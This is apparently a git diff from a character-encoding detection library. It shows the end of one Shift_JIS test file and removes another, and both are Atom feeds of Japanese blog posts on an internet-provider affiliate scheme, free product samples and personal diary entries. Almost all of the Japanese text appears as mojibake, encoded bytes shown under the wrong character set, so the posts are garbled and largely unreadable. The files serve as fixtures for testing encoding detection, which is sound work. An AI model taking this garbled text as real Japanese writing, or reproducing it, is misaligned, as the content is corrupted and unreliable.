    -ƒƒ“ƒNƒNƒ‰ƒu‰ןˆץ‚¯‚ּƒCƒ“ƒ^[ƒlƒbƒg‘±ƒT[ƒrƒX‚ֵAƒAƒiƒƒOAISDNAADSLAץ‚ָ‚ַeם‘־‰‚µ‚ִ‚¢‚‚·B‚±‚¿‚ח‚ֹ\‚µ‚‚ֶ1,600‰~‚ֵƒz[ƒ€ƒy[ƒWƒXƒy[ƒX100MB‚ֶƒ[ƒ‹ƒAƒhƒƒX2‚ֲ‚וt‚¢‚ִ‚«‚‚·B‚±‚ּƒXƒy[ƒX‚ֵ‚ֽƒAƒtƒBƒƒGƒCƒg—˜—p‚ֹ§ְ‚ׂ ‚ט‚‚·‚×Aƒƒ“ƒNƒNƒ‰ƒuƒCƒ“ƒ^[ƒlƒbƒg‚גד‹LƒT[ƒrƒX(ƒhƒƒCƒ“ƒp[ƒLƒ“ƒO‚נ‚­)—˜—pׂ‚ֽ–³—¿‚ֵAƒAƒtƒBƒƒGƒCƒg—˜—p‰ֲ”\‚ָƒuƒƒOƒT[ƒrƒXuƒƒ“ƒNƒƒOv‚נ—˜—p‚ֵ‚«‚‚·B

    - -

    ‚‚½Aƒƒ“ƒNƒNƒ‰ƒu‰ןˆץ‚ָ‚חAƒz[ƒ€ƒy[ƒW§ל‚ּd–‚נ’T‚µ‚½‚טA§לׂ‚נץ‚ֵ‚«‚יu‚ּ‚ֱ‚­‚ּ‚ֱ‚­v‚נ—˜—p‚·‚י‚±‚ֶ‚×o—ˆ‚‚·‚זפ
    -

    ]]> -
    -eםƒT[ƒrƒX‚ּ‚µ‚¢“א—e‚ֽ‚±‚±‚©‚ח‚²——‚ֹ‚ָ‚ך‚‚·B
    -
    -

    ]]> -
    -
    - -‚¨‚½‚‚µƒJƒLƒRƒ~‘א - -2005-04-17T15:34:16Z -2005-04-17T15:10:00Z -tag:celeb.lalalu.com,2005://1.102 -2005-04-17T15:10:00Z -ƒuƒƒO‚נ‰^‰c‚µ‚ִ‚¢‚יl‚ֹƒIƒXƒXƒ‚ּƒTƒCƒg‚×u‚¨‚½‚‚µƒJƒLƒRƒ~‘אv‚ֵ‚·B ƒTƒCƒg‚©... - -majo - - - -{ƒTƒ“ƒvƒ‹–ב‚ֱ‚¿‚ב‚¨‚ֱI - -ƒuƒƒO‚נ‰^‰c‚µ‚ִ‚¢‚יl‚ֹƒIƒXƒXƒ‚ּƒTƒCƒg‚×u‚¨‚½‚‚µƒJƒLƒRƒ~‘אv‚ֵ‚·B

    - -

    ƒTƒCƒg‚©‚ח‚µ‚½‚¢ƒTƒ“ƒvƒ‹₪•i‚נ\‚µ‚‚ֶ”“תד‚ֹ‘—‚ח‚ך‚ִ‚«‚‚·B(1₪•i‚ֹ‚ֲ‚«1“x‚ּ‚B‚א‚¿‚כ‚ס‘——¿‚א–³—¿‚ֵ‚·I)‚»‚ך‚נ‚µ‚½‚ ‚ֶA©•ׂ׉^‰c‚µ‚ִ‚¢‚יƒuƒƒO‚ֹ´‘z‚נ‘‚«‚‚‚·B(‘‚«‚ס‚¾•ס‚ֽ•K—v‚ ‚ט‚‚¹‚ס)
    -ֱ”ןׂ‚ּ¶‚ּ÷‚נ•·‚¢‚ִ₪•iJ”­‚ֹˆ—p‚µ‚½‚¢‚ֶ‚¢‚₪ƒ[ƒJ[‚³‚ס‚׃Tƒ“ƒvƒ‹‚נ’ס‹‚µ‚ִ‚¢‚‚·‚ּ‚ֵA—ַ‚¢‚±‚ֶ‚¾‚¯‚נ‘‚­‚ּ‚ֵ‚ֽ‚ָ‚­A³’¼‚ֹ‘‚­‚±‚ֶ‚׋‚‚ח‚ך‚ִ‚¢‚‚·B
    -‚«‚¿‚ס‚ֶƒJƒLƒRƒ~‚נ‚·‚ך‚־‘±‚¯‚ִ‚¢‚כ‚ס‚ָƒTƒ“ƒvƒ‹‚נ‚·‚±‚ֶ‚ֵׂ‚«‚‚·B‚¿‚ב‚ס‚ֶˆ“®‚µ‚ִ‚¢‚י‚ֶA—Dז“I‚ֹ‰¿’l‚ּ‚ ‚יƒTƒ“ƒvƒ‹‚ּ‚¨‚½‚‚µƒJƒLƒRƒ~‘א•וWˆִ“א‚׃[ƒ‹‚ֵ“ֽ‚«‚‚·פ

    - -

    „‚א•FƒZƒƒu‚ָƒ{ƒfƒB‚ּל‚ט•‚ֵA”—eײW‚ּ₪•i‚נ׀‰מ‚µ‚ִ‚¢‚½‚ֶ‚±‚כA‚¨—U‚¢‚נף‚¯AQ‰ֱ‚·‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚µ‚½B
    -‚±‚ּƒTƒCƒg‚ֹƒTƒ“ƒvƒ‹‚נ’ס‹‚µ‚ִ‚¢‚יƒVƒ‡ƒbƒv‚ֹ‚ֽ‘O‚©‚ח‹»–¡‚נ‚ֱ‚ִ‚¢‚½‚ּ‚ֵAy‚µ‚‚ָ‚ׂחƒTƒ“ƒvƒ‹‚נ‚µ‚ִ‚¢‚‚·B

    - -

    ƒuƒƒO‚נ‰^‰c‚µ‚ִ‚¢‚י‚©‚½‚ֽ¥”ס`פ

    ]]> - - - - - -
    ‚¨‚½‚‚µƒJƒLƒRƒ~‘א•il“¾•–@ƒTƒCƒg‚ֵף•t
    ‚¨—F’B׀‰מXƒLƒƒƒ“ƒy[ƒ“‚ ‚טפ
    ‰^‰c‰ן׀ƒGƒLƒZƒ“ƒgƒƒbƒNƒfƒUƒCƒ“”®‰ן׀
    - - -¦Xתװְ’ט‚ֵu‚¨—F’B׀‰מƒLƒƒƒ“ƒy[ƒ“v‚נ‚ג‚ֱ‚ִ‚¢‚‚·B
    -‚א‚µ‚א‚»‚ּ‚ֹ“o˜^‚·‚י•‚ׂ¢‚ח‚ֱ‚µ‚ב‚¢‚‚µ‚½‚חA׀‰מ³‚ֹuƒZƒƒu‚ָƒ{ƒfƒB‚ּל‚ט•(http://yaplog.jp/majo/)v‚ֶ‹L‚µ‚ִ‚¢‚½‚¾‚¯‚½‚חנ‚µ‚¢‚ֵ‚·פ - -


    -

    ]]> -
    -
    - -ƒƒ“ƒNƒNƒ‰ƒuƒRƒ}[ƒX - -2005-04-17T15:16:57Z -2005-04-17T15:09:52Z -tag:celeb.lalalu.com,2005://1.107 -2005-04-17T15:09:52Z -ƒƒ“ƒNƒNƒ‰ƒu‚ֽMacintosh‚ּƒ†[ƒUƒNƒ‰ƒu‚©‚ח”­“W‚µ‚½ƒCƒ“ƒ^[ƒlƒbƒgƒT[ƒrƒX... - -majo - - - -{ƒƒ“ƒNƒXƒ^ƒbƒt‚ֹ‚ָ‚יI - -ƒƒ“ƒNƒNƒ‰ƒu‚ֽMacintosh‚ּƒ†[ƒUƒNƒ‰ƒu‚©‚ח”­“W‚µ‚½ƒCƒ“ƒ^[ƒlƒbƒgƒT[ƒrƒXƒvƒƒoƒCƒ_‚ֵ‚·Beם‘±ƒT[ƒrƒX‚©‚חƒhƒƒCƒ“ז“¾Aƒz[ƒ€ƒy[ƒWAƒuƒƒO‚ָ‚ַiˆְ‚ָƒT[ƒrƒX‚×[ְ‚µ‚ִ‚¢‚י‚ּ‚ֵA¬–ס—¦‚ׂ‚¢‚ֶ•]”»‚ֵ‚·B(„‚ֽƒAƒtƒBƒƒGƒCƒgƒXƒ^ƒbƒt‚ֹ‚ָ‚י‘O‚ֹA‰½l‚א׀‰מ‚µ‚‚µ‚½``I־)

    - -

    ƒƒ“ƒNƒNƒ‰ƒuƒRƒ}[ƒX‚ֽ1‚ֲ‚ּƒoƒi[‚ֵ6‚ֲ‚ּƒT[ƒrƒX‚ֹ¬ק•סV‚ֲׂ‚­‚ּ‚ֵAƒT[ƒrƒX–ˆ‚ֹ‚½‚­‚³‚ס‚ּƒoƒi[‚נ“\‚י•K—v‚ׂ ‚ט‚‚¹‚סBMacg‚¢‚ּW‚‚ט‚¾‚¯‚ ‚ֱ‚ִHHAƒoƒi[‚אƒLƒƒC‚ָF‚ּ‚א‚ּ‚בµ‚ֱ‚ִ‚¢‚‚·‚ּ‚ֵAƒAƒtƒBƒƒGƒCƒg‚µ‚½‚¢‚¯‚ַAƒTƒCƒg‚ּƒCƒ[ƒW‚נ‘¹‚ָ‚¢‚½‚­‚ָ‚¢I‚ֶ‚¢‚₪•‚ֹ‚אƒsƒbƒ^ƒ‚ֵ‚·B(^_-)-™

    ]]> - - - - - - - -
    •סV”­¶•–@¬ק•סV
    •סVz(1‚ ‚½‚ט)\200`\10,000
    Wvת/U“ת–ˆ––Y¬–ס¬—§m”F—‚X15“ת/
    ¬–ס³”F—‚15“ת•¥
    ֵ’בUz\5,000
    ‰^‰c‰ן׀ƒƒ“ƒNƒNƒ‰ƒu
    - - -]]> -
    -
    - -‚±‚ך‚©‚חƒz[ƒ€ƒy[ƒW‚נל‚י‚ָ‚ח - -2005-04-17T13:57:44Z -2005-04-17T13:09:16Z -tag:celeb.lalalu.com,2005://1.106 -2005-04-17T13:09:16Z -ƒAƒ“ƒP[ƒg‚גƒ[ƒ‹‚ֵƒ|ƒCƒ“ƒg‚נ’™‚‚י‚ּ‚ֽy‚µ‚¢‚¯‚ך‚ַA‚א‚ֱ‚ֶƒlƒbƒg‚נˆ—p‚µ‚ִ“... - -majo - - - -{“‚נ“¾‚יˆ׳‚ּƒz[ƒ€ƒy[ƒWל‚ט - -ƒAƒ“ƒP[ƒg‚גƒ[ƒ‹‚ֵƒ|ƒCƒ“ƒg‚נ’™‚‚י‚ּ‚ֽy‚µ‚¢‚¯‚ך‚ַA‚א‚ֱ‚ֶƒlƒbƒg‚נˆ—p‚µ‚ִ“‚נ“¾‚½‚¢‚ֶv‚ֱ‚½‚חAƒz[ƒ€ƒy[ƒW‚נל‚ֱ‚ִƒAƒtƒBƒƒGƒCƒg‚גƒƒ“ƒNƒXƒ^ƒbƒt‚נ‚·‚י‚ֶ‚¢‚₪•–@‚ׂ ‚ט‚‚·B
    -–³—¿‚ּHPƒXƒy[ƒX‚גƒuƒƒO‚ֽ‚½‚­‚³‚ס‚ ‚י‚ּ‚ֵA”ן—p‚נ—}‚¦‚ִƒTƒCƒg‚נ‰^‰c‚·‚י‚±‚ֶ‚×ָ’P‚ֹ‚ָ‚ט‚‚µ‚½B‚ ‚ֶ‚ֽ©•ֹׂ‡‚ֱ‚½‰^‰c•–@‚נ‘I‚װ‚±‚ֶ‚בו״‚ֵ‚·B

    - -

    ƒz[ƒ€ƒy[ƒWל¬ƒ\ƒtƒg‚א“תXƒOƒ[ƒhƒAƒbƒv‚µ‚ִ‚¢‚י‚ּ‚ֵA‚»‚₪‚¢‚ֱ‚½ƒ\ƒtƒg‚נw“‚·‚ך‚־A‚ ‚‚טװ‚נ‚©‚¯‚¸‚ֹƒz[ƒ€ƒy[ƒW‚נל‚י‚±‚ֶ‚ֵׂ‚«‚‚·‚µAֵ‹—¬s‚ּuƒuƒƒOv‚ָ‚חA“o˜^‚©‚חל¬‚‚ֵA‚‚ֶ‚ס‚ַ•׳‹­‚·‚י•K—v‚א‚ָ‚­‰^‰c‚נJno—ˆ‚‚·B(‚½‚¾‚µAƒAƒtƒBƒƒGƒCƒg‚ֹ§ְ‚ׂ ‚ֱ‚½‚טA‹–‰ֲ‚µ‚ִ‚¢‚ָ‚¢HPƒXƒy[ƒX‚גƒuƒƒOƒTƒCƒg‚א‚ ‚ט‚‚·‚ּ‚ֵA״‚ט‚י‚ֶ‚«‚ֹ‹K–ס‚נ“ַ‚‚‚µ‚ו‚₪‚ֻI)

    - -

    ‚ ‚ֶ‚ֽA‚ַ‚ס‚ָƒz[ƒ€ƒy[ƒW‚ֹ‚·‚י‚©A‚ֶ‚¢‚₪‚ּ‚בו‚«‚ָƒe[ƒ}‚ֹ‚ָ‚י‚ֶv‚¢‚‚·Bu‚¨¬­‚¢‰ׂ‚¬v‚גu•›‹ֶv‚נƒe[ƒ}‚ֹ‚µ‚½ƒz[ƒ€ƒy[ƒW‚ֽש‚ֹ‚½‚­‚³‚ס‚ ‚י‚ּ‚ֵA‚»‚ּ’†‚ֵ–—§‚ֲ‘¶‚ֹ‚ָ‚י‚ּ‚ֽA³’¼A‘ו•ֿ‚¾‚ֶv‚₪‚ּ‚ֵA‹“_‚נ•ֿ‚¦‚ִA©•ּׂ“¾ˆ׃•×–ל‚ֵל¬‚·‚י‚ּ‚×—ַ‚¢‚ס‚¶‚ב‚ָ‚¢‚©‚ֶv‚¢‚‚·B‚»‚₪‚¢‚₪ƒz[ƒ€ƒy[ƒW‚ֵ¬ק‚µ‚ִ‚¢‚יƒTƒCƒg‚א‚½‚­‚³‚ס‚ ‚ט‚‚·‚©‚חB

    - -

    ן–¡‚ּƒy[ƒW‚ֵ‚אA©•ֶׂׂ‚ִ‚א‹»–¡‚נ‚ֱ‚ִ‚¢‚ִA”M‚­ך‚ך‚י‚±‚ֶ‚ׂ ‚יI‚»‚ך‚ֽ‹‰“I‚ֹ–K–גׂ‚נה‚«•t‚¯‚ִA‚»‚ּƒTƒCƒg‚ּƒtƒ@ƒ“‚נ‘‚ג‚·‚±‚ֶ‚ֹ‚ָ‚י‚ֶv‚¢‚‚·B
    -‘½‚­‚ּl‚נה‚«•t‚¯‚ִ‚י‚₪‚¿‚ֹAYahoo!‚ּƒT[ƒtƒ@[‚³‚ס‚אה‚«•t‚¯‚ִuV’…ƒsƒbƒNƒAƒbƒv(¡T‚ּƒIƒXƒXƒ)v‚ֹ‘I‚ס‚ֵ–ב‚¦‚½‚חAˆך‹C‚ֹƒXƒeƒbƒvƒAƒbƒvII‚ב_‚¦‚י‚©‚אIH

    - -

    v‚¢‚ֲ‚«‚ג‚׀‚ח‚‚«‚א‘ו–‚¾‚¯‚ַAƒTƒCƒg‚נ‰^‰c‚·‚י‘O‚ֹA‚¶‚ֱ‚­‚ט\‘z‚נ—‚ֱ‚½•‚׈׃O‚ֶ‹“¹‚ּ‚ז‚₪‚ָ‹C‚ׂµ‚‚·‚זB

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/clickablewords.com.xml b/chardet/tests/SHIFT_JIS/clickablewords.com.xml deleted file mode 100644 index 78c7b7d..0000000 --- a/chardet/tests/SHIFT_JIS/clickablewords.com.xml +++ /dev/null @@ -1,367 +0,0 @@ - - - -clickable words - -2005-12-22T11:06:50Z -‚½‚©‚±‚ֹ‚ז‚יƒeƒLƒXƒgƒTƒCƒgBƒRƒ‰ƒ€A¬אAA“ת‹L“™B -tag:clickablewords.com,2006://6 -Movable Type -Copyright (c) 2005, takako - -‚ ‚½‚ח‚µ‚¢‚¨‚₪‚¿ - -2005-12-22T11:06:50Z -2005-12-22T11:06:21Z -tag:clickablewords.com,2005://6.346 -2005-12-22T11:06:21Z -‚ ‚½‚ח‚µ‚¢‰ֶ‚נ‚א‚ח‚ֱ‚ִ‚²–‰x‚ּ‚ז‚א‚¬‚³‚סBƒpƒZƒ‚³‚ס‚ֽ‚‚¾‚ֹ‚ב‚ס‚±ƒnƒEƒX‚ֹ“‚ח‚ָ... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‚ ‚½‚ח‚µ‚¢‰ֶ‚נ‚א‚ח‚ֱ‚ִ‚²–‰x‚ּ‚ז‚א‚¬‚³‚סBƒpƒZƒ‚³‚ס‚ֽ‚‚¾‚ֹ‚ב‚ס‚±ƒnƒEƒX‚ֹ“‚ח‚ָ‚¢Blװ‚ּƒxƒbƒh‚©ƒq[ƒ^[‚ּ‘O‚ּ‚‚₪‚×’g‚©‚¢‚א‚ס‚ָ[

    ]]> - -
    -
    - -¡A©‚¦‚י•ׂ¾‚¯‚ֵAƒ_ƒ“ƒ{[ƒ‹9ֲB - -2005-12-18T17:28:46Z -2005-12-18T17:26:41Z -tag:clickablewords.com,2005://6.344 -2005-12-18T17:26:41Z -500M‚ֶ—£‚ך‚ִ‚¢‚ָ‚¢ƒ}ƒ“ƒVƒ‡ƒ“‚ֹˆר‚ֱ‰z‚µ‚‚µ‚½B ƒ}ƒ“ƒVƒ‡ƒ“‚ּ‚ִ‘ײ‚¦‚ֹ‚ז‚י—§... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -500M‚ֶ—£‚ך‚ִ‚¢‚ָ‚¢ƒ}ƒ“ƒVƒ‡ƒ“‚ֹˆר‚ֱ‰z‚µ‚‚µ‚½B
    -ƒ}ƒ“ƒVƒ‡ƒ“‚ּ‚ִ‘ײ‚¦‚ֹ‚ז‚י—§‚¿‘‚«B–“|‚ָ‚±‚ֶ‚ֵ‚·B

    - -

    –³–‚ֹˆר‰z‚µ‚ֽֿ‚ס‚¾‚¯‚ך‚ַA‰ֶ‚ּ’†‚ֽ‘•ֿ‚ם‚ח‚¸ƒ_ƒ“ƒ{[ƒ‹‚¾‚ח‚¯‚¾B

    - -

    «•ן•J«‚‚ֵƒpƒbƒN‚ּƒR[ƒX‚¾‚ֱ‚½‚ּ‚¾‚×A‚א‚ֶ‚א‚ֶƒ_ƒ“ƒ{[ƒ‹‚ֹ‚¢‚ך‚ֱ‚ֿ‚¾‚ֱ‚½‚ּ‚ֶ‚©A‚א‚¿‚כ‚סJ«‚µ‚ִ‚­‚ך‚ָ‚¢‚ּ‚¾B

    - -

    ‚¢‚ֲ‚א‚«‚ך‚¢‚ֹ‚µ‚ִ‚¢‚י‰ֶ‚ָ‚ח‚־A‚»‚ּ‚‚ƒRƒs[‚µ‚½‚ז‚₪‚ֹ‚«‚ך‚¢‚ֹ•ְ‚׳‚ִ‚­‚ך‚י‚ּ‚©‚א‚µ‚ך‚B

    - -

    “]‹‚ּ‚¨’m‚ח‚¹‚ֶ‚©A
    -‚‚ֱ‚½‚­‚µ‚ִ‚ָ‚¢B
    -e‚ֹ‚אI

    - -

    ‚ [B€‚ֹ‚»‚₪‚ָ12B
    -®אר‚ֹ‚ג‚כ‚₪‚ֶ‚µ‚ָ‚¢‚±‚ֶ‚בו״B

    - -

    ‰ֶ‚ֽ‰˜‚¢‚‚‚ֵ‚אOKB
    -–ֶ‹–‘‚ּZ•ֿX‚ֶ‚©A”ט‘±‚«‚אד‚‚ם‚µ‚ֵOKB
    -H‚׳•¨‚אA‚¨•“–‚ֶOH‚ֵOKB
    -‰ֶ‚ּ‚±‚ֶA©•ּׂ‚±‚ֶ‚ֽד‰ס‚µ‚ֵ[B

    ]]> - -
    -
    - -‚­‚ׁ‚ם - -2005-11-16T10:29:20Z -2005-11-16T10:29:17Z -tag:clickablewords.com,2005://6.343 -2005-11-16T10:29:17Z -‚ז‚א‚³‚סV‚µ‚¢ס—ײ‚ֵ‚ ‚יB ^‚ֵ‚ֽ‚ז‚­‚ם‚©‚ח‚ָ‚¢‚׃sƒ“ƒN’n‚ֹƒ‰ƒCƒ“ƒXƒg[ƒ“‚וְ... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‚ז‚א‚³‚סV‚µ‚¢ס—ײ‚ֵ‚ ‚יB -^‚ֵ‚ֽ‚ז‚­‚ם‚©‚ח‚ָ‚¢‚׃sƒ“ƒN’n‚ֹƒ‰ƒCƒ“ƒXƒg[ƒ“‚וְ‚ס‚ֵ‚¢‚ִƒLƒ…[ƒg‚ָ‚ּ‚ֵ‚·B

    ]]> - -
    -
    - -‚ֻ‚ - -2005-11-08T10:50:02Z -2005-11-08T10:47:44Z -tag:clickablewords.com,2005://6.342 -2005-11-08T10:47:44Z -‚ֻ‚‚ז‚אB... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‚ֻ‚‚ז‚אB

    ]]> - -
    -
    - -ƒoƒCƒg•וW’† - -2005-11-02T14:58:16Z -2005-10-24T06:49:52Z -tag:clickablewords.com,2005://6.341 -2005-10-24T06:49:52Z -11‚ֹA‰ן׀‚נל‚י‚±‚ֶ‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵAˆך‚ֹ“­‚­ƒXƒ^ƒbƒt‚³‚ס‚נ•וW’†‚ֵ‚·B ‚ֶA... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -11‚ֹA‰ן׀‚נל‚י‚±‚ֶ‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵAˆך‚ֹ“­‚­ƒXƒ^ƒbƒt‚³‚ס‚נ•וW’†‚ֵ‚·B
    -‚ֶA‚¢‚₪‚ז‚₪‚ָ’m‚נA‚²‚­ֲl“I‚ָ‚±‚ּƒuƒƒO‚ֹ‚ּ‚ֱ‚¯‚ִA‚ֽ‚½‚µ‚ִˆ׃–¡‚ׂ ‚י‚ּ‚¾‚כ‚₪‚©EEEB‚ֶv‚¢‚ֲ‚ֲ‚אA‚ּ‚ֱ‚¯‚ִ‚¨‚±‚₪I װ‚ֽL‚­I

    - -

    yWEBƒfƒUƒCƒi[AWEBƒfƒUƒCƒi[ƒAƒVƒXƒ^ƒ“ƒg•וWz
    -‹־–±`‘װ‚ֽƒAƒ‹ƒoƒCƒgB
    -WEBƒfƒUƒCƒ“o±ׂ½}I–¢o±‚ֵ‚אOKI
    -T3“תˆָדB
    -_“ל§‚ּ‘–ֽ‘ו–ל‚ֵ‚ּ‹־–±‚ֵ‚·B
    -‹»–¡‚ּ‚ ‚י•‚ֽƒ[ƒ‹‚­‚¾‚³‚¢B

    - -

    ’N‚©ˆך‚ֹ‰ן׀‚נ·‚טד‚°‚ִ‚­‚¾‚³‚¢[I

    ]]> - -
    -
    - -‚»‚₪‚ֵ‚·‚ֻB - -2005-10-19T17:12:09Z -2005-10-19T17:09:38Z -tag:clickablewords.com,2005://6.340 -2005-10-19T17:09:38Z - - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‚¨‹C‚¿‚ֽ‚ז‚­‚ם‚©‚ט‚‚·B

    ]]> - -
    -
    - -l‚¦‚ִ‚א“‚¦‚ֽ‚ֵ‚ָ‚¢ - -2005-09-28T21:14:15Z -2005-09-28T20:53:57Z -tag:clickablewords.com,2005://6.339 -2005-09-28T20:53:57Z -“ת‚ֹ‰½“x‚אAƒpƒZƒ‚³‚ס‚ֶ‚ז‚א‚¬‚³‚ס‚נ©‚ִ־‚ֱ‚ִ‚µ‚‚₪B‚ָ‚ס‚ֵ”—‚½‚¿‚ּ‚±‚ֶA‚±‚ס... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -“ת‚ֹ‰½“x‚אAƒpƒZƒ‚³‚ס‚ֶ‚ז‚א‚¬‚³‚ס‚נ©‚ִ־‚ֱ‚ִ‚µ‚‚₪B‚ָ‚ס‚ֵ”—‚½‚¿‚ּ‚±‚ֶA‚±‚ס‚ָ‚ֹˆ₪‚µ‚­v‚₪‚ּ‚¾‚כ‚₪Blװ‘ט‚ּuD‚«v‚ֶˆב‚ֱ‚ִA‚ֶ‚ִ‚א‹­‚­‚ִ—h‚¬–³‚¢ˆ₪‚µ‚³‚¾B

    - -

    ז“תA‚ָ‚ט‚³‚ס‚ֶAuD‚«‚ֶ‚ֽ‚ָ‚ס‚¼‚גA‹¥‚ֶ‚ֽ‚ָ‚ס‚¼‚גv‚ֶ‚¢‚₪˜b‚נ‚µ‚½B
    -u‹¥v‚ֶ‚¢‚₪‚ּ‚×Aֵ‹‚ז‚­‚ם‚©‚ח‚ָ‚¢B“®•¨‚ֶˆב‚ֱ‚ִq‘·”ֹ‰h‚ּ‚‚ּ‚½‚‚ֹ‘¶‚µ‚ִ‚¢‚י‚ּ‚ֵ‚ֽ‚ָ‚³‚»‚₪‚¾B¥ˆק“ֽ‚ֶ‚¢‚₪‚א‚ּ‚ׂ ‚י‚ּ‚¾‚©‚חA_–ס‚ֹ‹‚¢‚א‚ּ‚ָ‚ּ‚¾‚כ‚₪‚¯‚ַA‚א‚ֱ‚ֶB–†‚ָ‚א‚ּ‚¾B‹¥ט–]‚ֶ‚¢‚₪‚א‚ּ‚ָׂ‚©‚ֱ‚½‚ם‚½‚µ‚ֹ‚ֽA‚ז‚­‚ם‚©‚ח‚ָ‚¢B‘ד‚ֹ‚ז‚ֱ‚ִ‘‚ֹ‚ז‚ֱ‚ִ‹¥‚ּƒJƒ^ƒ`‚ֽˆב‚₪‚ּ‚¾‚כ‚₪‚×A»‚ּזi‘‚ֵ‚‚“¯‚¶‚ָ‚חA¡‚ּ`‘װ‚×ֵI`‘װ‚¾‚כ‚₪‚©B
    -30־‚ּq‚¿‚ּ—«‚גA—ˆ”N‚ֹ‹¥‚נ‚׀‚©‚¦‚½’j«‚ֶ‚א˜b‚µ‚½‚¯‚ך‚ַA‚ם‚©‚ח‚ָ‚¢B‹¥‚ֱ‚ִ‰½‚ּ‚½‚‚ֹ•K—v‚ָ‚ּ‚¾‚ֱ‚½‚ֱ‚¯B

    - -

    ‚ ‚ֶ‚׀‚ֶ‚ֲB
    -‚ם‚½‚µ‚ֽ•ƒ‚ג•ך‚גo‚ֹ‘־‚µ‚ִA‹­‚­ˆ₪‚נ´‚¶‚ִ‚¢‚ִA‰ֶ‘°‚×K‚¹‚ֹ‚µ‚ִ‚¢‚י—lq‚נ•·‚­‚ֶA‚ם‚½‚µ‚א‰½‚©’ך‚ּ‚‚₪‚©‚ח‚¶‚ס‚ם‚טK‚¹‚ֹ‚ָ‚יB‚±‚₪‚¢‚₪ג‘־“I‚ָˆ₪‚ֽA‚¢‚ֲ‚©”z‹פׂ‚ֹ‘־‚µ‚ִ‚א‚ִ‚י‚א‚ּ‚ָ‚ּ‚¾‚כ‚₪‚©B‚ם‚½‚µ‚ּ’m‚י‚½‚¢‚ִ‚¢‚ּ•v•w‚×”z‹פׂ‚ֹ‘־‚µ‚ִ‚ֱ‚ִ‚¢‚יuD‚«v‚ֶ‚¢‚₪´מ‚ֽA—צˆ₪´מ‚גAמ‚ּ‚ז‚₪‚ֹv‚¦‚יB‚×o‚ִ‚־A—h‚¬–³‚¢‰ֶ‘°ˆ₪‚ֹ‚ָ‚י‚ּ‚©‚ָBˆ₪‚נם—•ׂ¯‚µ‚ִ‚א‚µ‚ו‚₪‚ָׂ‚¢‚¯‚ַA‰½‚©—h‚¬–³‚¢‚א‚ּ‚ֹ“²‚ך‚יB

    ]]> - -
    -
    - -3˜A‹x - -2005-09-24T14:58:21Z -2005-09-24T14:58:11Z -tag:clickablewords.com,2005://6.338 -2005-09-24T14:58:11Z -3˜A‹x‚ֵ‚ ‚יB ‚×A“ת—j“ת‚ֹd–n‚ּƒZƒ~ƒi[ט“`‚¢‚׈ך“ת“‚ֱ‚ִ‚¢‚י‚ּ‚ֵAְ¿A... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -3˜A‹x‚ֵ‚ ‚יB
    -‚×A“ת—j“ת‚ֹd–n‚ּƒZƒ~ƒi[ט“`‚¢‚׈ך“ת“‚ֱ‚ִ‚¢‚י‚ּ‚ֵAְ¿A‹אE“y‚ּ‚‚ּ‹x‚‚¾B¡“ת‚ֽ‚א‚₪Au—j“ת‘O–י‚ּ‹C•×v‚ֵ‚ ‚יB
    -‹א—j“ת‚ֽA®‘S‹x—{“ת‚ֹ‚µ‚½B
    -‚ָ‚ט‚×’·–ל‚ֹ‹A‚ֱ‚ִ‚¢‚½‚ּ‚ֵA‚׀‚ֶ‚ט‚«‚ט‚ּ‹x“ת‚ֵ‰H‚נ‚ּ‚־‚·B
    -‚»‚ך‚ֵ‰½‚נ‚µ‚½‚©‚ֶ‚¢‚₪‚ֶA–‰ז‹i’ƒ‚ֵ10װADVD‚נ״‚ט‚ִ‚«‚ִ2װiƒAƒƒ‚נ©‚ִ‚‚½B©‚½ד‚µ‚ ‚ם‚¹‚ָ‹C‚¿‚ֹ‚ָ‚ך‚י‚ֶ•·‚¢‚ִ‚¢‚½‚×A‚»‚ך‚‚ַ‚ֵ‚ֽ‚ָ‚©‚ֱ‚½jA‚»‚ך‚©‚ח¬א“ַ‚‚ֽ‚¶‚‚ִ‰½װ‚¾‚ֱ‚¯ccA‚ֶ‚ט‚ ‚¦‚¸•¨ך’׀‚¯‚ֵ‚ ‚יB[“d‚³‚ך‚½B
    -“y—j“ת‚ֽAd–‚·‚י‚¼‚ֶv‚ֱ‚ִ‚¢‚½‚×A‡–°‚נ‚‚³‚‚טA‰ֶ–‚µ‚ִA”L‚³‚‚½‚¿‚ֶ‚½‚ם‚‚ך‚ִAd–‚·‚י‚½‚PC‚ּ‘O‚ְֹ‚ֱ‚½‚ּ‚ֹ‚ָ‚÷‚©yahoo“®‰ז‚ֵu–¼¢ƒ‰ƒbƒV[v‚נ©‚ִ‹ƒ‚¢‚ִ‚¢‚½B
    -»2342•×B
    -‚ַ‚₪‚µ‚ִ‚±‚ס‚ָ‚ֹ‚ּo‚ֲ‚ּ‚ב‚¢‚ּ‚¾Bd–‚µ‚‚·I

    ]]> - -
    -
    - -‚ז‚א‚¬•”‰® - -2005-09-15T06:34:58Z -2005-09-15T05:24:12Z -tag:clickablewords.com,2005://6.335 -2005-09-15T05:24:12Z -^B‰e—p‚ּƒ{ƒbƒNƒX‚נ‚ֱ‚ִ‚¢‚יB‘O’†‚ֹd–‚ֵg‚₪₪•i^‚נ‚¿‚ו‚±‚ֱ‚ֶB‚ֱ‚ִA... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -^B‰e—p‚ּƒ{ƒbƒNƒX‚נ‚ֱ‚ִ‚¢‚יB‘O’†‚ֹd–‚ֵg‚₪₪•i^‚נ‚¿‚ו‚±‚ֱ‚ֶB‚ֱ‚ִA•׀•t‚¯‚א‚¹‚¸‚ֹƒoƒ^ƒoƒ^‘ֵ‚¿‡‚ם‚¹‚ֹo‚©‚¯‚½‚חA‚¢‚ֲ‚ּװ‚ֹ‚©‚ז‚א‚¬‚ּ•”‰®‚ֹ‚ָ‚ֱ‚ִ‚¢‚½B

    ]]> - -
    -
